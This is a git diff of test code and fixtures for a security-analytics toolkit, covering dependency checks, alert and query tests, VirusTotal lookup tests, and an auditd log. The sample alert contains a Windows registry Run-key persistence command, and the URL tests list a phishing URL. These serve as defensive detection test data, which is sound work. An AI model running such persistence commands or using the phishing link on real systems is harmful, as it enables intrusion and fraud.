+@pytest.fixture(scope="module")
+def extras_from_setup():
+    """Read extras packages from setup.py."""
+    return get_extras_from_setup(extra="all")
+
+
+def test_missing_pkgs_req():
+    """Check for packages used in code but not in requirements.txt."""
+    mod_imports = analyze_imports(
+        package_root=PKG_ROOT, package_name=PKG_NAME, req_file=REQS_FILE
+    )
+    import_errs = {v for s in mod_imports.values() for v in s.unknown}
+    print("re module path:", re.__file__)
+    print("Import errors:\n", import_errs)
+    stdlib_paths = {
+        p
+        for p in sys.path
+        if p.lower().startswith(sys.prefix.lower()) and "site-packages" not in p
+    }
+    print("sys.path", sys.path)
+    print("sys.prefix", sys.prefix)
+    print("Stdlib paths:\b", stdlib_paths)
+
+    missing_req_mod = {
+        f"{req}:{mod}" for mod, reqs in mod_imports.items() for req in reqs.missing_reqs
+    }
+    missing_reqs = {
+        req.strip() for reqs in mod_imports.values() for req in reqs.missing_reqs
+    }
+    missing_reqs = missing_reqs - EXTRAS_EXCEPTIONS
+    if missing_reqs:
+        print(
+            "Missing packages:\n",
+            "\n".join(
+                req for req in missing_req_mod if req.split(":")[0] in missing_reqs
+            ),
+        )
+    check.is_false(missing_reqs)
+
+
+def test_conda_reqs(extras_from_setup):
+    """Test conda requirements files match main file."""
+    main_reqs_file = Path(PKG_ROOT) / REQS_FILE
+    conda_reqs_file = Path(PKG_ROOT) / "conda/conda-reqs.txt"
+    conda_reqs_pip_file = Path(PKG_ROOT) / "conda/conda-reqs-pip.txt"
+
+    main_reqs_dict = _get_reqs_from_file(main_reqs_file)
+    # Add extras
+    for item in [re.split(REQS_OP_RGX, line) for line in extras_from_setup]:
+        main_reqs_dict[item[0].strip()] = item[1].strip() if len(item) > 1 else None
+
+    conda_reqs_dict = _get_reqs_from_file(conda_reqs_file)
+    conda_reqs_pip_dict = _get_reqs_from_file(conda_reqs_pip_file)
+
+    for key, val in main_reqs_dict.items():
+        # print(f"Checking {key} in conda-reqs.txt", bool(key in conda_reqs_dict))
+        # print(f"Checking {key} in conda-reqs-pip.txt", bool(key in conda_reqs_pip_dict))
+
+        if (
+            key not in conda_reqs_dict
+            and key not in conda_reqs_pip_dict
+            and key not in CONDA_PKG_EXCEPTIONS
+        ):
+            print(f"Test Error - no conda package equiv for {key}=={val}")
+        check.is_true(
+            key in conda_reqs_dict
+            or key in conda_reqs_pip_dict
+            or key in CONDA_PKG_EXCEPTIONS,
+        )
+        if key in conda_reqs_dict:
+            if conda_reqs_dict[key]:
+                if val != conda_reqs_dict[key]:
+                    print(
+                        f"{key} version mismatch - setup: {val}: {conda_reqs_dict[key]}",
+                        "in conda-reqs.txt",
+                    )
+                check.equal(val, conda_reqs_dict[key], f"{key} in condas reqs")
+            conda_reqs_dict.pop(key)
+        if key in conda_reqs_pip_dict:
+            if conda_reqs_pip_dict[key]:
+                if val != conda_reqs_pip_dict[key]:
+                    print(
+                        f"{key} version mismatch - setup: {val}: {conda_reqs_pip_dict[key]}",
+                        "in conda-reqs-pip.txt",
+                    )
+                check.equal(val, conda_reqs_pip_dict[key], f"{key} in condas pip reqs")
+            conda_reqs_pip_dict.pop(key)
+
+    if conda_reqs_dict:
+        print("Extra items found in conda-reqs.txt", conda_reqs_pip_dict)
+    check.is_false(conda_reqs_dict, "no extra items in conda-reqs.txt")
+    if conda_reqs_pip_dict:
+        print("Extra items found in conda-reqs-pip.txt", conda_reqs_dict)
+    check.is_false(conda_reqs_pip_dict, "no extra items in conda-reqs-pip.txt")
+
+
+def _get_reqs_from_file(reqs_file):
+    conda_reqs_dict = {}
+    with open(str(reqs_file), "r") as f_hdl:
+        reqs = f_hdl.readlines()
+        lines = [line for line in reqs if not line.strip().startswith("#")]
+        for item in [re.split(REQS_OP_RGX, line) for line in lines]:
+            conda_reqs_dict[item[0].strip()] = (
+                item[1].strip() if len(item) > 1 else None
+            )
+    return conda_reqs_dict
diff --git a/tests/test_query_mgr.py b/tests/test_query_mgr.py
deleted file mode 100644
index e010694f9..000000000
--- a/tests/test_query_mgr.py
+++ /dev/null
@@ -1,135 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""query_mgr test class."""
-import unittest
-from datetime import datetime
-
-from .. msticpy.nbtools import query_builtin_queries as queries
-from .. msticpy.nbtools import kql
-from .. msticpy.nbtools.query_mgr import replace_query_params, add_query, required_params
-from .. msticpy.nbtools.query_defns import DataFamily, DataEnvironment, KqlQuery, QueryParamProvider
-
-
-class QPTest(QueryParamProvider):
-    """Unit test class."""
-    def __init__(self, p_dict):
-        self._p_dict = p_dict
-
-    @property
-    def query_params(self):
-        """Return dict of query parameters."""
-        return self._p_dict
-
-
-class TestQueryManager(unittest.TestCase):
-    """Unit test class."""
-
-    def test_nbqueries(self):
-
-        self.assertGreaterEqual(len(queries.query_definitions), 5)
-        # try:
-        #     subst_query = replace_query_params('list_alerts_counts')
-        # except ValueError as val_err:
-        self.assertRaises(ValueError, replace_query_params, 'list_alerts_counts')
-        before_alerts = len(queries.query_definitions)
-        add_query(KqlQuery(name='dummy_query',
-                           query='''
-                                {table}
-                                {query_project}
-                                | where StartTimeUtc >= datetime({start})
-                                | where StartTimeUtc <= datetime({end})
-                                | summarize alertCount=count(), firstAlert=min(StartTimeUtc),
-                                lastAlert=max(StartTimeUtc) by AlertName
-                                | order by alertCount desc
-                                ''',
-                           description='Retrieves summary of current alerts',
-                           data_source='security_alert',
-                           data_families=[DataFamily.WindowsSecurity],
-                           data_environments=[DataEnvironment.LogAnalytics]))
-        add_query(name='dummy_query2',
-                  query='''
-                        {table}
-                        {query_project}
-                        | where StartTimeUtc >= datetime({start})
-                        | where StartTimeUtc <= datetime({end})
-                        | summarize alertCount=count(), firstAlert=min(StartTimeUtc),
-                        lastAlert=max(StartTimeUtc) by AlertName
-                        | order by alertCount desc
-                        ''',
-                  description='Retrieves summary of current alerts',
-                  data_source='security_alert',
-                  data_families=[DataFamily.WindowsSecurity],
-                  data_environments=[DataEnvironment.LogAnalytics])
-        self.assertEqual(before_alerts + 2, len(queries.query_definitions))
-
-        self.assertIn('get_alert', kql.__dict__)
-        self.assertIn('get_process_parent', kql.__dict__)
-
-        # This returns None and prints output but should execute with error
-        self.assertRaises(LookupError, kql.get_process_parent)
-
-        # from  datetime import datetime, timedelta
-        # end_time = datetime.utcnow()
-        # start_time = end_time - timedelta(hours=4)
-        # try:
-        #     nbqueries.list_alerts_counts(data_family='LinuxSecurity',
-        # start=start_time, end=end_time)
-        # except Exception as ex_type:
-        #     pass
-
-    def test_query_params(self):
-
-        start_end = {
-            'start': datetime(2018, 11, 23, 23, 36, 2, 894637),
-            'end': datetime(2018, 11, 29, 23, 36, 2, 894637)}
-        qptest1 = QPTest(start_end)
-
-        self.assertIn('list_alerts_counts', queries.query_definitions)
-        q_result = replace_query_params('list_alerts_counts', qptest1)
-        self.assertIsNotNone(q_result)
-        self.assertIn('SecurityAlert', q_result)
-        self.assertIn('project', q_result)
-        self.assertIn('2018-11-23', q_result)
-
-        # Try with different query that expects an additional
-        self.assertIn('get_alert', queries.query_definitions)
-        try:
-            q_result = replace_query_params('get_alert', qptest1)
-        except:
-            q_result = None
-            pass
-        self.assertIsNone(q_result)
-
-        alertid = {'system_alert_id': '{some guid}'}
-
-        qptest2 = QPTest(alertid)
-        # Try with different query that expects an additional
-        self.assertIn('get_alert', queries.query_definitions)
-        q_result = replace_query_params('get_alert', qptest1, qptest2)
-        self.assertIsNotNone(q_result)
-        self.assertIn('SecurityAlert', q_result)
-        self.assertIn('project', q_result)
-        self.assertIn('2018-11-23', q_result)
-        self.assertIn('SystemAlertId', q_result)
-        self.assertIn('{some guid}', q_result)
-
-        q_result3 = kql.get_alert(provs=[qptest1, qptest2])
-        self.assertIsNotNone(q_result3)
-        self.assertIn('SecurityAlert', q_result3)
-        self.assertIn('project', q_result3)
-        self.assertIn('2018-11-23', q_result3)
-        self.assertIn('SystemAlertId', q_result3)
-        self.assertIn('{some guid}', q_result3)
-
-    def test_builtin_query_params(self):
-        for _, kquery in queries.query_definitions.items():
-            for param in required_params(kquery):
-                self.assertIn(param, queries.KNOWN_PARAM_NAMES)
-
-
-if __name__ == '__main__':
-    unittest.main()
-    print('bye')
diff --git a/tests/test_query_schema.py b/tests/test_query_schema.py
deleted file mode 100644
index 35c869b9d..000000000
--- a/tests/test_query_schema.py
+++ /dev/null
@@ -1,74 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""query_schema test class."""
-import unittest
-
-from .. msticpy.nbtools.query_schema import DataSchema
-from .. msticpy.nbtools.query_defns import DataFamily, DataEnvironment
-
-
-class TestQuerySchema(unittest.TestCase):
-    """Unit test class."""
-    def setUp(self):
-        self.schema = DataSchema(environment='LogAnalytics', 
-                                 data_family='WindowsSecurity', 
-                                 data_source='process_create')
-
-    def test_global_properties(self):
-        self.assertGreaterEqual(len(self.schema.data_environments), 2)
-        self.assertGreaterEqual(len(self.schema.data_families), 2)
-        self.assertGreaterEqual(len(self.schema.data_source_types), 3)
-
-    def test_SecurityAlert(self):
-        for src in ['security_alert']:
-            schema = DataSchema(environment='LogAnalytics', data_family='SecurityAlert', data_source=src)
-            self.assertTrue('table' in schema)
-            self.assertTrue('query_project' in schema)
-            if src == 'security_alert':
-                self.assertGreaterEqual(len(schema['query_project'].split(',')), 23)
-                self.assertEqual(schema['table'], 'SecurityAlert')
-
-    def test_WindowsSecurity(self):
-        for src in ['process_create', 'account_logon']:
-            schema = DataSchema(environment='LogAnalytics', data_family='WindowsSecurity', data_source=src)
-            self.assertTrue('table' in schema)
-            self.assertTrue('query_project' in schema)
-            if src == 'proc_create':
-                self.assertGreaterEqual(len(schema['query_project'].split(',')), 17)
-                self.assertEqual(schema['table'], 'SecurityEvent | where EventID == 4688')
-            elif src == 'account_logon':
-                self.assertGreaterEqual(len(schema['query_project'].split(',')), 19)
-                self.assertEqual(schema['table'], 'SecurityEvent | where EventID == 4624')
-
-    def test_LinuxSecurity(self):
-        for src in ['process_create', 'account_logon']:
-            schema = DataSchema(environment='LogAnalytics', data_family='LinuxSecurity', data_source=src)
-            self.assertTrue('table' in schema)
-            self.assertTrue('query_project' in schema)
-            if src == 'proc_create':
-                self.assertGreaterEqual(len(schema['query_project'].split(',')), 17)
-                self.assertEqual(schema['table'], 'LinuxAuditD | where EventID == 14688')
-            elif src == 'account_logon':
-                self.assertGreaterEqual(len(schema['query_project'].split(',')), 19)
-                self.assertEqual(schema['table'], 'LinuxAuditD | where EventID == 1100 or EventID == 1112')
-
-    def test_default_schemas(self):
-        schemas = DataSchema.default_schemas(environment=DataEnvironment.LogAnalytics,
-                                             data_family=DataFamily.WindowsSecurity)
-        self.assertIsNotNone(schemas)
-        self.assertGreaterEqual(len(schemas), 2)
-        schemas = DataSchema.default_schemas(environment=DataEnvironment.LogAnalytics,
-                                             data_family=DataFamily.LinuxSecurity)
-        self.assertIsNotNone(schemas)
-        self.assertGreaterEqual(len(schemas), 2)
-        schemas = DataSchema.default_schemas(environment=DataEnvironment.LogAnalytics,
-                                             data_family=DataFamily.SecurityAlert)
-        self.assertIsNotNone(schemas)
-        self.assertGreaterEqual(len(schemas), 1)
-
-
-if __name__ == '__main__':
-    unittest.main()
diff --git a/tests/test_security_alert.py b/tests/test_security_alert.py
deleted file mode 100644
index cf8fb56c9..000000000
--- a/tests/test_security_alert.py
+++ /dev/null
@@ -1,155 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""security_alert test class."""
-import sys
-import unittest
-import pandas as pd
-
-from .. msticpy.nbtools import SecurityAlert
-from .. msticpy.nbtools.security_alert_graph import create_alert_graph
-from .. msticpy.nbtools.nbdisplay import display_alert
-from .. msticpy.nbtools.query_defns import DataFamily, DataEnvironment
-
-
-sample_alert = {
-    'StartTimeUtc': '2018-09-27 16:59:16',
-    'EndTimeUtc': '2018-09-27 16:59:16',
-    'ProviderAlertId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',
-    'SystemAlertId': '2518642332435550951_b6329e79-0a94-4035-beee-c2',
-    'ProviderName': 'Detection',
-    'VendorName': 'Microsoft',
-    'AlertType': 'RegistryPersistence',
-    'AlertDisplayName': 'Windows registry persistence method detected',
-    'Severity': 'Low',
-    'IsIncident': False,
-    'ExtendedProperties': {
-        'resourceType': 'Non-Azure Resource',
-        'enrichment_tas_threat__reports': '{"Kind":"MultiLink","DisplayValueToUrlDictionary":{"Report: Registry Persistence":"https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Registry-Persistence.pdf?sv=2018-03-28&sr=b&sig=TCqDRg1fQUp1P0gEznjM5wdqOGAKmAhsVzk4WPnx5gU%3D&spr=https&st=2018-09-27T13:37:57Z&se=2018-12-26T13:52:57Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=bdb7e59d-8ba8-4351-aa6d-eedc6b916aa5"}}',
-        'parent process id':  '0x940',
-        'account logon id':  '0x3e7',
-        'User SID':  'S-1-5-18',
-        'command line':  'reg  add hkey_current_user\\software\\microsoft\\windows\\currentversion\\run /v cclientcleandll /t reg_sz /d "c:\\windows\\temp\\epdeldll.bat" /f',
-        'process name':  'c:\\windows\\system32\\reg.exe',
-        'process id':  '0x1670',
-        'domain name':  'DOM',
-        'user name':  'DOM\\TESTHOST$',
-        'parent process':  'cmd.exe',
-        'Persisted Process':  'c:\\windows\\temp\\epdeldll.bat'
-    },
-    'CompromisedEntity': 'TESTHOST',
-    'Entities': [
-        {'Type': 'host', '$id': '1', 'HostName': 'TESTHOST', 'DnsDomain': 'DOM.CONTOSO.COM', 'IsDomainJoined': True,
-         'NTDomain': 'DOM', 'NetBiosName': 'TESTHOST', 'OsVersion': None, 'OSFamily': 'Windows'},
-        {'Type': 'file', '$id': '2',
-         'Directory': 'c:\\windows\\system32', 'Name': 'cmd.exe'},
-        {'Type': 'process', '$id': '3', 'CommandLine': '', 'Host': {
-            '$ref': '1'}, 'ProcessId': '0x940', 'ImageFile': {'$ref': '2'}},
-        {'Type': 'account', '$id': '4', 'Name': 'TESTHOST$', 'IsDomainJoined': True,
-         'NTDomain': 'DOM', 'Host': {'$ref': '1'}, 'LogonId': '0x3e7', 'Sid': 'S-1-5-18'},
-        {'Type': 'file', '$id': '5',
-         'Directory': 'c:\\windows\\system32', 'Name': 'reg.exe'},
-        {'Type': 'process', '$id': '6', 'CommandLine': 'reg  add hkey_current_user\\software\\microsoft\\windows\\currentversion\\run /v cclientcleandll /t reg_sz /d "c:\\windows\\temp\\epdeldll.bat" /f',
-         'Host': {'$ref': '1'}, 'ProcessId': '0x1670', 'ImageFile': {'$ref': '5'}, 'CreationTimeUtc': '2018-09-27T16:59:16.4449048Z', 'ParentProcess': {'$ref': '3'}, 'Account': {'$ref': '4'}, 'ElevationToken': 'Default'},
-        {'Type': 'registry-key', '$id': '7',
-         'Key': 'software\\microsoft\\windows\\currentversion\\run', 'Hive': 'HKEY_CURRENT_USER'},
-        {'Type': 'registry-value', '$id': '8',
-         'ValueType': 'Unknown', 'Key': {'$ref': '7'}},
-        {'Type': 'registry-value', '$id': '9', 'Name': 'cclientcleandll', 'ValueType': 'String', 'Key': {'$ref': '7'}, 'Value': 'System.Byte[]'}],
-    'ConfidenceLevel': 'Unknown',
-    'ConfidenceScore': None,
-    'ConfidenceReasons': None,
-    'Intent': 'Persistence',
-    'ExtendedLinks': None,
-    'AzureResourceId': None,
-    'AzureResourceSubscriptionId': None,
-    'TenantId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',
-    'WorkspaceId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',
-    'AgentId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',
-    'SourceComputerId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',
-    'SystemSource': 'Non-Azure',
-    'WorkspaceSubscriptionId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',
-    'WorkspaceResourceGroup': 'test-east-us',
-    'TimeGeneratedUtc': '2018-09-27 16:59:47',
-}
-
-
-class TestQuerySchema(unittest.TestCase):
-
-    def setUp(self):
-        self.raw_alert = pd.Series(sample_alert)
-        self.raw_alert['StartTimeUtc'] = pd.to_datetime(self.raw_alert['StartTimeUtc'])
-        self.raw_alert['EndTimeUtc'] = pd.to_datetime(self.raw_alert['EndTimeUtc'])
-        self.raw_alert['TimeGeneratedUtc'] = pd.to_datetime(self.raw_alert['TimeGeneratedUtc'])
-    
-    def test_alert_import(self):
-        alert = SecurityAlert(self.raw_alert)
-
-        str_alert = str(alert)
-        self.assertIsNotNone(str_alert)
-        self.assertIsNotNone(alert)
-        self.assertGreaterEqual(len(alert.entities), 0)
-        self.assertGreaterEqual(len(alert.ExtendedProperties), 0)
-        self.assertGreaterEqual(len(alert['ExtendedProperties']), 0)
-        self.assertIn('StartTimeUtc', alert)
-        self.assertIn('EndTimeUtc', alert)
-        self.assertIn('SystemAlertId', alert)
-        self.assertIn('SystemAlertId', alert)
-        self.assertIn('ProviderName', alert)
-        self.assertIn('VendorName', alert)
-        self.assertIn('AlertType', alert)
-        self.assertIn('AlertDisplayName', alert)
-        self.assertIn('Severity', alert)
-        self.assertIn('IsIncident', alert)
-
-        str_alert = str(alert)
-        self.assertIsNotNone(str_alert)
-        repr_alert = repr(alert)
-        self.assertIsNotNone(repr_alert)
-
-        #
-        self.assertIsNotNone(alert.primary_host)
-        self.assertEqual('TESTHOST', alert.primary_host.HostName)
-        self.assertIsNotNone(alert.primary_process)
-        self.assertIsNotNone(alert.primary_process.ProcessFilePath)
-        self.assertEqual('c:\\windows\\system32\\reg.exe', alert.primary_process.ProcessFilePath)
-        self.assertIsNotNone(alert.primary_account)
-        self.assertEqual('TESTHOST$', alert.primary_account.Name)
-        self.assertEqual('DOM\\TESTHOST$', alert.primary_account.qualified_name)
-        self.assertEqual('0x3e7', alert.get_logon_id())
-
-        self.assertIn('SourceComputerId', alert.host_filter(operator='=='))
-        self.assertTrue(alert.is_in_log_analytics)
-        self.assertTrue(alert.is_in_workspace)
-        self.assertFalse(alert.is_in_azure_sub)
-        self.assertIsNotNone(alert.host_filter(operator='=='))
-        self.assertIn('true', alert.subscription_filter(operator='=='))
-
-        self.assertEqual(2, len(alert.get_entities_of_type(entity_type='file')))
-
-        self.assertGreater(len(alert.query_params), 5)
-        self.assertEqual(alert.data_family, DataFamily.WindowsSecurity)
-        self.assertEqual(alert.data_environment, DataEnvironment.LogAnalytics)
-
-    def test_alert_display(self):
-
-        alert = SecurityAlert(self.raw_alert)
-        entity_str = ', '.join([str(e) for e in alert.entities])
-        self.assertIsNotNone(entity_str)
-        alert_html = alert.to_html(show_entities=True)
-        self.assertIsNotNone(alert_html)
-        alert_html = alert.to_html(show_entities=False)
-        self.assertIsNotNone(alert_html)
-
-    def test_alert_graph(self):
-        alert = SecurityAlert(self.raw_alert)
-        alert_graph = create_alert_graph(alert)
-        self.assertIsNotNone(alert_graph)
-        self.assertLessEqual(5, len(alert_graph.nodes))
-
-    def test_alert_entities(self):
-        alert = SecurityAlert(self.raw_alert)
-        for ent in alert.entities:
-            self.assertIsNotNone(ent.description_str)
diff --git a/tests/test_vtlookup.py b/tests/test_vtlookup.py
deleted file mode 100644
index 6f6485368..000000000
--- a/tests/test_vtlookup.py
+++ /dev/null
@@ -1,201 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""vtlookup test class."""
-import unittest
-import os
-from os import path
-
-import pandas as pd
-from .. msticpy.sectools.vtlookup import VTLookup
-
-_test_data_folders = [d for d, _, _ in os.walk(os.getcwd()) if d.endswith('/tests/testdata')]
-if len(_test_data_folders) == 1:
-    _TEST_DATA = _test_data_folders[0]
-else:
-    _TEST_DATA = './tests/testdata'
-
-
-class TestVTLookup(unittest.TestCase):
-
-    _TEST_COLS = ['Observable', 'IoCType', 'Status', 'ResponseCode',
-                  'Resource', 'SourceIndex', 'VerboseMsg', 'Resource', 'ScanId',
-                  'Permalink', 'Positives', 'MD5', 'SHA1', 'SHA256',
-                  'ResolvedDomains', 'ResolvedIPs', 'DetectedUrls']
-
-    def test_ipvalidation(self):
-
-        vtlookup = VTLookup(vtkey='fake', verbosity=2)
-        test_ips = [
-            ('valid', '90.156.201.27', '90.156.201.27'),
-            ('local_ip', '10.0.0.1', None),
-            ('mask', '255.255.20.27', None),
-            ('loopback', '127.0.0.1', None),
-            ('bad_format', '122.1.3', None)]
-
-        for test_case in test_ips:
-            result, status = vtlookup._preprocess_observable(test_case[1], 'ipv4')
-            self.assertEqual(result, test_case[2])
-            print(test_case[0], status)
-
-    def test_urlvalidation(self):
-        vtlookup = VTLookup(vtkey='fake', verbosity=2)
-        v1_url = 'http://club-fox.ru/img/www.loginalibaba.com/alibaba/alibaba/login.alibaba.com.php?email=biuro'
-        v2_url = 'https://www.virustotal.com/en/ip-address/90.156.201.27/information/'
-        test_urls = [
-            ('valid1', v1_url, v1_url),
-            ('valid2', 'https://microsoft.com', 'https://microsoft.com'),
-            ('valid3', 'https://python.org', 'https://python.org'),
-            ('valid3', v2_url, v2_url),
-            ('local_ip', 'http://10.0.0.1/foo', None),
-            ('local_hostname', 'https://myhost/path', None),
-            ('invalid1', 'http//club-fox.ru/foo.html', None),
-            ('invalid2', '//club-fox.ru/foo.html', None),
-            ('invalid3', 'https://123:microsoft.com@user/foo.txt', None),
-            ('invalid4', 'http//10.0.0.1/foo.txt', None)]
-
-        for test_case in test_urls:
-            result, status = vtlookup._preprocess_observable(test_case[1], 'url')
-            print(test_case[0], status)
-            self.assertEqual(result, test_case[2], f'Failed on test case {test_case} ({test_case[1]})')
-
-    def test_parse_file_results(self):
-        vtlookup = VTLookup(vtkey='fake', verbosity=2)
-
-        FILE_NAME = path.join(_TEST_DATA, 'fileresponse.json')
-        with open(FILE_NAME, 'r') as file_handle:
-            txt = file_handle.read()
-         
-        vt_params = vtlookup._VT_API_TYPES['file']
-        vtlookup._parse_vt_results(vt_results=txt, 
-                                   observable='7657fcb7d772448a6d8504e4b20168b8', 
-                                   ioc_type='md5_hash',
-                                   vt_param=vt_params)
-
-        test_df = vtlookup.results[self._TEST_COLS]
-        self.assertEqual(len(test_df), 1)
-        print(test_df.T)
-
-        vtlookup = VTLookup(vtkey='fake', verbosity=2)
-        FILE_NAME2 = path.join(_TEST_DATA, 'file-multi_pos.json')
-        with open(FILE_NAME2, 'r') as file_handle:
-            txt = file_handle.read()
-         
-        vt_params = vtlookup._VT_API_TYPES['file']
-        vtlookup._parse_vt_results(vt_results=txt, 
-                                   observable='7657fcb7d772448a6d8504e4b20168b8', 
-                                   ioc_type='md5_hash',
-                                   vt_param=vt_params)
-
-        test_df = vtlookup.results[self._TEST_COLS]
-        self.assertEqual(len(test_df), 3)
-        print(test_df.T)
-
-    def test_parse_url_results(self):
-        vtlookup = VTLookup(vtkey='fake', verbosity=2)
-
-        FILE_NAME = path.join(_TEST_DATA, 'url_pos.json')
-        with open(FILE_NAME, 'r') as file_handle:
-            txt = file_handle.read()
-         
-        vt_params = vtlookup._VT_API_TYPES['url']
-        vtlookup._parse_vt_results(vt_results=txt, 
-                                   observable='7657fcb7d772448a6d8504e4b20168b8', 
-                                   ioc_type='url',
-                                   vt_param=vt_params)
-        test_df = vtlookup.results[self._TEST_COLS]
-        self.assertEqual(len(test_df), 1)
-        print(test_df.T)
-
-        vtlookup = VTLookup(vtkey='fake', verbosity=2)
-        FILE_NAME2 = path.join(_TEST_DATA, 'url_neg.json')
-        with open(FILE_NAME2, 'r') as file_handle:
-            txt = file_handle.read()
-         
-        vt_params = vtlookup._VT_API_TYPES['url']
-        vtlookup._parse_vt_results(vt_results=txt, 
-                                   observable='7657fcb7d772448a6d8504e4b20168b8', 
-                                   ioc_type='url',
-                                   vt_param=vt_params)
-        test_df = vtlookup.results[self._TEST_COLS]
-        self.assertEqual(len(test_df), 1)
-        print(test_df.T)
-
-    def test_parse_domain_results(self):
-        vtlookup = VTLookup(vtkey='fake', verbosity=2)
-
-        FILE_NAME = path.join(_TEST_DATA, 'domain_pos.json')
-        with open(FILE_NAME, 'r') as file_handle:
-            txt = file_handle.read()
-         
-        vt_params = vtlookup._VT_API_TYPES['domain']
-        vtlookup._parse_vt_results(vt_results=txt, 
-                                   observable='7657fcb7d772448a6d8504e4b20168b8', 
-                                   ioc_type='dns',
-                                   vt_param=vt_params)
-
-        test_df = vtlookup.results[self._TEST_COLS]
-        self.assertEqual(len(test_df), 1)
-        self.assertGreater(len(test_df[['ResolvedIPs']]), 0)
-        self.assertGreater(len(test_df[['DetectedUrls']].values), 0)
-        self.assertGreater(test_df[['Positives']].values, 0)
-
-        print(test_df.T)
-
-        vtlookup = VTLookup(vtkey='fake', verbosity=2)
-        FILE_NAME2 = path.join(_TEST_DATA, 'domain_neg.json')
-        with open(FILE_NAME2, 'r') as file_handle:
-            txt = file_handle.read()
-         
-        vt_params = vtlookup._VT_API_TYPES['domain']
-        vtlookup._parse_vt_results(vt_results=txt, 
-                                   observable='7657fcb7d772448a6d8504e4b20168b8', 
-                                   ioc_type='dns',
-                                   vt_param=vt_params)
-        test_df = vtlookup.results[self._TEST_COLS]
-        self.assertEqual(len(test_df), 1)
-        self.assertGreater(len(test_df[['ResolvedIPs']].values), 0)
-        self.assertGreater(len(test_df[['DetectedUrls']].values), 0)
-        print(test_df.T)
-
-    def test_parse_ip_results(self):
-        vtlookup = VTLookup(vtkey='fake', verbosity=2)
-
-        FILE_NAME = path.join(_TEST_DATA, 'ip-address_pos.json')
-        with open(FILE_NAME, 'r') as file_handle:
-            txt = file_handle.read()
-         
-        vt_params = vtlookup._VT_API_TYPES['ip-address']
-        vtlookup._parse_vt_results(vt_results=txt, 
-                                   observable='7657fcb7d772448a6d8504e4b20168b8', 
-                                   ioc_type='ipv4',
-                                   vt_param=vt_params)
-        test_df = vtlookup.results[self._TEST_COLS]
-        self.assertEqual(len(test_df), 1)
-        self.assertGreater(len(test_df[['ResolvedDomains']].values), 0)
-        self.assertGreater(len(test_df[['DetectedUrls']].values), 0)
-        self.assertGreater(test_df[['Positives']].values, 0)
-        print(test_df.T)
-
-        vtlookup = VTLookup(vtkey='fake', verbosity=2)
-        FILE_NAME2 = path.join(_TEST_DATA, 'ip-address_neg.json')
-        with open(FILE_NAME2, 'r') as file_handle:
-            txt = file_handle.read()
-         
-        vt_params = vtlookup._VT_API_TYPES['ip-address']
-        vtlookup._parse_vt_results(vt_results=txt, 
-                                   observable='7657fcb7d772448a6d8504e4b20168b8', 
-                                   ioc_type='ipv4',
-                                   vt_param=vt_params)
-        test_df = vtlookup.results[self._TEST_COLS]
-        self.assertEqual(len(test_df), 1)
-        self.assertGreater(len(test_df[['ResolvedDomains']].values), 0)
-        self.assertEqual(test_df[['Positives']].values, 0)
-        print(test_df.T)
-
-
-if __name__ == '__main__':
-    unittest.main()
-    print('bye')
diff --git a/tests/testdata/as_threatintel b/tests/testdata/as_threatintel
new file mode 100644
index 000000000..59078038e
Binary files /dev/null and b/tests/testdata/as_threatintel differ
diff --git a/tests/testdata/auditd_log.txt b/tests/testdata/auditd_log.txt
new file mode 100644
index 000000000..f4efdc6e4
--- /dev/null
+++ b/tests/testdata/auditd_log.txt
@@ -0,0 +1,1708 @@
+type=DAEMON_START msg=audit(1551485405.594:7507): op=start ver=2.8.2 format=raw kernel=4.18.0-1011-azure auid=4294967295 pid=16049 uid=0 ses=4294967295 subj=unconfined  res=success
+type=CONFIG_CHANGE msg=audit(1551485405.619:18): audit_backlog_limit=8192 old=64 auid=4294967295 ses=4294967295 subj==unconfined res=1
+type=CONFIG_CHANGE msg=audit(1551485405.619:19): audit_failure=1 old=1 auid=4294967295 ses=4294967295 subj==unconfined res=1
+type=CONFIG_CHANGE msg=audit(1551485405.619:20): audit_backlog_wait_time=0 old=15000 auid=4294967295 ses=4294967295 subj==unconfined res=1
+type=SERVICE_START msg=audit(1551485405.619:21): pid=1 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='unit=auditd comm="systemd" exe="/lib/systemd/systemd" hostname=? addr=? terminal=? res=success'
+type=USER_AUTH msg=audit(1551485408.371:22): pid=15745 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485408.371:23): pid=15745 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485410.503:24): pid=15745 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485410.503:25): pid=15745 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_END msg=audit(1551485410.555:26): pid=15671 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
